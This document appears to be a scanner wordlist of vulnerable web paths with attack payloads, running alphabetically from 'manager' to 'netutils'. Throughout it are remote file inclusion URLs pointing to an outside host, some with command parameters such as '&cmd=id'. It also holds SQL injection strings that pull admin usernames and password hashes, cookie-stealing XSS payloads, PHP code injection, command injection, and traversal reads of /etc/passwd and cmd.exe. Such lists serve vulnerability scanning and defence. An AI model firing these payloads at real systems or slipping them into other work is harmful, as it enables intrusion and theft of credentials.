manager/articles.php?_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
manager/editor/admin/login.aspx
manager/editor/admin_login.asp
manager/editor/admin_login.aspx
manager/editor/admin_login.php
manager/editor/login.asp
manager/editor/login.php
manager/eweb/admin/login.asp
manager/eweb/admin/login.aspx
manager/eweb/admin/login.jsp
manager/eweb/admin/login.php
manager/eweb/admin_login.asp
manager/eweb/admin_login.aspx
manager/eweb/admin_login.jsp
manager/eweb/admin_login.php
manager/ewebeditor/admin/login.php
manager/ewebeditor/admin_login.asp
manager/ewebeditor/admin_login.aspx
manager/ewebeditor/admin_login.php
manager/ewebeditor/login.asp
manager/html
manager/html-manager-howto.html
manager/manager-howto.html
manager/static/view.php?propID=0&INC=http://www.yxlink.com/nvs_test.txt
manager/webeditor/admin_login.asp
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
map.php?lat=%3C/script%3E%3Cscript%3Ealert(111)%3C/script%3E
mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,md5(333),salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
mapi/comm.php
master.php?root_path=http://www.yxlink.com/nvs_test.txt
master/set_1.aspx
mc-icons/
mcNews/admin/header.php?skinfile=http://www.yxlink.com/nvs_test.txt
mcf.php?content=http://www.yxlink.com/nvs_test.txt
mcnews/admin/install.php?l=http://www.yxlink.com/nvs_test.txt
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.yxlink.com/nvs_test.txt
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
member.php/>\x22><ScRiPt>alert(32323)</ScRiPt>
member.php?action='
member.php?action=login : username='
member.php?vwar_root=http://www.yxlink.com/nvs_test.txt
member.php?vwar_root=http://www.yxlink.com/nvs_test.txt&cmd=ls
member/ajax_membergroup.php?action=post&membergroup=@`\xE2\x80\x99`%20Union%20select%20md5(333333)%20from%20`%23@__admin`%20where%201%20or%20id=@`\xE2\x80\x99`
member/login.php?forward=\x22><script>alert(111)</script>
member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.baidu.com%3E
member/member.php?username=luoye%cf union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,md5(333),password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1/
member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML
member/usercp_menu.php?script_folder=http://www.yxlink.com/nvs_test.txt
memberlist.php?=>\x22'><ScRiPt>alert(333)</ScRiPt>
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
members/index.php?INC=http://www.yxlink.com/nvs_test.txt?
members/registration.php?INC=http://www.yxlink.com/nvs_test.txt?
members_help.php?hlp=http://www.yxlink.com/nvs_test.txt?
membres/membreManager.php?include_path=http://www.yxlink.com/nvs_test.txt
membres/membreManager.php?include_path=http://www.yxlink.com/nvs_test.txt?
menu.php3?cl_headers=http://www.yxlink.com/nvs_test.txt
menu.php?functions_file=http://www.yxlink.com/nvs_test.txt
menu_dx.php?SITE_Path=http://www.yxlink.com/nvs_test.txt
mep/frame.php?chem=http://www.yxlink.com/nvs_test.txt
mep/frame.php?chem=http://www.yxlink.com/nvs_test.txt?
message.php?act='and(select/**/1/**/from/**/(select/**/count(*),concat(md5(333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'&city=fujian&id=4&
message.php?action=scout\x22><script>alert(111)</script>
message.php?action=scout\x22><script>alert(222);</script>
messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22
microcms-include.php?microcms_path=http://www.yxlink.com/nvs_test.txt
microcms/includes/file_manager/special.php?fm_includes_special=http://www.yxlink.com/nvs_test.txt
middle.php?file=http://www.yxlink.com/nvs_test.txt
migrateNE2toNE3.php?_NE[AbsPath]=http://www.yxlink.com/nvs_test.txt
mima.php
mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://www.yxlink.com/nvs_test.txt?
mini-pub.php/front-end/img.php?sFileName=http://www.yxlink.com/nvs_test.txt?
minimal/wiki.php?page=http://www.yxlink.com/nvs_test.txt?
misc.php/>\x22><ScRiPt>alert(333)</ScRiPt>
misc.php?do=page&template={${phpinfo()}}
misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,md5(333),16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1
misc.php?sub=profile&name=0%27
misc/function.php3?path=http://www.yxlink.com/nvs_test.txt?
mitglieder.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
mkportal/include/user.php?MK_PATH=http://www.yxlink.com/nvs_test.txt
moadmin.php?action=listRows&collection=1&find=array%281%29;@print%20md5%28333%29;exit
mobile/user.php?act=order_list
mod/authent.php4?rootpath=http://www.yxlink.com/nvs_test.txt
mod/image/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/liens/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/liste/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/nc_phpmyadmin/core/libraries/Theme_Manager.class.php?GLOBALS=http://www.yxlink.com/nvs_test.txt
mod/special/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod/texte/index.php?config[pathMod]=http://www.yxlink.com/nvs_test.txt
mod_membre/inscription.php?chemin=http://www.yxlink.com/nvs_test.txt?
mod_ose_docs
mod_phpalbum/sommaire_admin.php?chemin=http://www.yxlink.com/nvs_test.txt?
modcp.php?action=post_del&x='
modcp.php?action=post_del&x=6&y='
moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')//
modernbill/include/html/config.php?DIR=http://www.yxlink.com/nvs_test.txt
modifyform.html?code=http://www.yxlink.com/nvs_test.txt
modoer/space.php?suid=1%d5%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5(333),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
mods/apage/apage.cgi?f=file.htm.|id|
mods/business_functions.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
mods/config/load.inc.php?moddir=http://www.yxlink.com/nvs_test.txt?
mods/http/load.inc.php?moddir=http://www.yxlink.com/nvs_test.txt?
mods/ui_functions.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
modsecurity.php?inc_prefix=http://www.yxlink.com/nvs_test.txt
module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(3333)%3C/script%3E
module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(333)%3C/script%3E
module/article/article/article.asp?articleid='
module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp
module/forum/forum.php?fd=http://www.yxlink.com/nvs_test.txt=';
module/forum/main.php?id=1&main_dir=http://www.yxlink.com/nvs_test.txt?&
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
modules.php?modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,md5(333),4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownload
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,md5(333),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
modules.php?name=Reviews&rop=postcomment&id='&title=<h1>22222</h1>
modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,md5(333),0,aid/**/FROM/**/nuke_authors
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Surveys&pollID=a'
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=http://www.yxlink.com/nvs_test.txt&file=article&sid=2
modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,md5(333),3,4,5+from+nuke_authors
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=All&sortby='
modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(md5(333),0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules/4nAlbum/public/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.yxlink.com/nvs_test.txt
modules/Calendar/admin/update.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Calendar/calendar.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Calendar/scheme.php?calpath=http://www.yxlink.com/nvs_test.txt?
modules/Discipline/CategoryBreakdownTime.php?FocusPath=http://www.yxlink.com/nvs_test.txt
modules/Discipline/CategoryBreakdownTime.php?staticpath=http://www.yxlink.com/nvs_test.txt
modules/Discipline/StudentFieldBreakdown.php?staticpath=http://www.yxlink.com/nvs_test.txt
modules/Downloads/voteinclude.php
modules/Forums/admin/admin_avatar.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_disallow.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_forumauth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_groups.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_ranks.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_user_ban.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/admin/index.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\x5C\x22><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
modules/My_eGallery/index.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/My_eGallery/public/displayCategory.php?basepath=http://www.yxlink.com/nvs_test.txt
modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://www.yxlink.com/nvs_test.txt?
modules/NukeAI/util.php?AIbasedir=http://www.yxlink.com/nvs_test.txt
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/md5(333)/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1
modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
modules/abook/foldertree.php?baseDir==http://www.yxlink.com/nvs_test.txt?
modules/addons/plugin.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/include/config.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/include/localize.php?doc_root=http://www.yxlink.com/nvs_test.txt
modules/admin/vw_usr_roles.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/agendax/addevent.inc.php?agendax_path=http://www.yxlink.com/nvs_test.txt&cmd=id
modules/bank/includes/design/main.inc.php?bank_data[root]=http://www.yxlink.com/nvs_test.txt
modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
modules/birstday/birst.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/birstday/profile_show.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/birstday/select.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/blocks/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/calendar/index.php?inc_dir=http://www.yxlink.com/nvs_test.txt
modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.yxlink.com/nvs_test.txt?
modules/calendar/mod_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/certinfo/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/character_roster/include.php?mod_root=http://www.yxlink.com/nvs_test.txt?
modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/content/fields/author/field_edit_form.inc.php?setting[defaultvalue]=aa\x22  /><script>alert(window.location.href)</script>
modules/content/fields/author/field_edit_form.inc.php?setting[defaultvalue]=aa\x22  /><script>alert(window.location.href)</script>abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.yxlink.com/nvs_test.txt
modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
modules/documents/tree.documents.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
modules/emails/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/events/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/fax/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/files/blocks/latest_files.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/files/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/files/list.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/filters/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=http://www.yxlink.com/nvs_test.txt?
modules/forums/blocks/latest_posts.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/global/inc/content.inc.php?sIncPath=http://www.yxlink.com/nvs_test.txt?
modules/groupadm/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/groups/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/guestbook/index.php?CONFIG[local_root]=http://www.yxlink.com/nvs_test.txt?
modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/history/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/home.module.php?repmod=http://www.yxlink.com/nvs_test.txt?
modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.yxlink.com/nvs_test.txt
modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/info/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/links/blocks/links.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/log/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/mail/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/menu/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/messages/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,md5(333),1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn
modules/mod_as_category.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_flatmenu.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
modules/mod_weather.php?absolute_path=http://www.yxlink.com/nvs_test.txt
modules/module_db.php?pivot_path=http://www.yxlink.com/nvs_test.txt
modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
modules/newbb/edit.php?forum=1&topic_id=1&viewmode=flat&order=ASC\x22><script>alert(2222)</script>&post_id=1
modules/newbb_plus/config.php?bbPath[root_theme]=http://www.yxlink.com/nvs_test.txt
modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0
modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201/
modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,md5(333),1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0
modules/newbb_plus/votepolls.php?bbPath[path]=http://www.yxlink.com/nvs_test.txt
modules/news/blocks/latest_news.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/organizations/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/phones/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/pms/index.php?module_path=http://www.yxlink.com/nvs_test.txt???
modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yxlink.com/nvs_test.txt
modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yxlink.com/nvs_test.txt?
modules/presence/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/gantt.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/projects/gantt2.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/projects/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/list.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/summary.inc.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/projects/vw_files.php?dPconfig[root_dir]=http://www.yxlink.com/nvs_test.txt
modules/public/calendar.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/public/date_format.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/punish/p_error.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/punish/profile.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/reports/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/repository/comment_edit.php?com_itemid=1&com_order=0&com_mode=flat&cid=1&cid=1\x22><script>alert(2222)</script>&com_id=1
modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=http://www.yxlink.com/nvs_test.txt
modules/search/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://www.yxlink.com/nvs_test.txt
modules/settings/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/snf/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/syslog/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/gantt.php?baseDir=http://www.yxlink.com/nvs_test.txt
modules/tasks/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/searchsimilar.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/tasks/summary.inc.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/threadstop/threadstop.php?exbb[home_path]=http://www.yxlink.com/nvs_test.txt?
modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/tml/block.tag.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=http://www.yxlink.com/nvs_test.txt
modules/useradm/index.php?full_path=http://www.yxlink.com/nvs_test.txt
modules/users/headerfile.php?system[path]=http://www.yxlink.com/nvs_test.txt
modules/vWar_Account/includes/functions_common.php?vwar_root2=http://www.yxlink.com/nvs_test.txt
modules/visitors2/include/config.inc.php?lvc_include_dir=http://www.yxlink.com/nvs_test.txt?
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yxlink.com/nvs_test.txt
modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,md5(333),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
modules/whatsnew/whatsnew.php?GLOBALS[rootdp]=&GLOBALS[language_home]=http://www.yxlink.com/nvs_test.txt
modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modules/xfsection/modify.php?dir_module=http://www.yxlink.com/nvs_test.txt
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
modulistica/mdl_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.yxlink.com/nvs_test.txt?
month.php?query=CalendarDetailsID=-1) UNION SELECT md5(333),0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
moodle/admin/utfdbmigrate.php?cmd=http://www.yxlink.com/nvs_test.txt
moosegallery/display.php?type=http://www.yxlink.com/nvs_test.txt?&cmd=[command]
mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
moteur/moteur.php?chemin=http://www.yxlink.com/nvs_test.txt?
movie/movie_index.tpl.php
movie_cls.php?full_path=http://www.yxlink.com/nvs_test.txt
mrtg.cgi?cfg=blah
msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.yxlink.com/nvs_test.txt
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\x5C\x22><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\x5C\x22><script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\x5C\x22><script>alert('Vulnerable')</script>
msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,md5(333),3,2,3,4,5,6,7,8,9/*
msglist.adp?folder=<script>alert(document.cookie)</script>
mt-static/mt.cfg
mt/mt.cfg
multihtml.pl?multi=/etc/passwd%00html
music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
mutant_includes/mutant_functions.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=http://www.yxlink.com/nvs_test.txt
mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yxlink.com/nvs_test.txt
myhome.php?action=messages&box=<form%20name=a><input%20name=i%20value=XSS></form><script>alert(document.a.i.value)</script>
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpcommander_path/system/lib/package.php?gl_root=http://www.yxlink.com/nvs_test.txt?cmd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myps.php?action=donate&username=\x22/> <script>alert(3333)</script>
mysave.php?file=http://www.yxlink.com/nvs_test.txt
mysql.php
n.html
n.php
na_admin/
na_admin/ataglance.html
naboard_pnr.php?skin=http://www.yxlink.com/nvs_test.txt?
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
ncaster/admin/addons/archive/archive.php?adminfolder=http://www.yxlink.com/nvs_test.txt
nconf/detail.php?id=1%27
netbasic/websinfo.bas
netutils/findata.stm?host=<script>alert(document.cookie)</script>
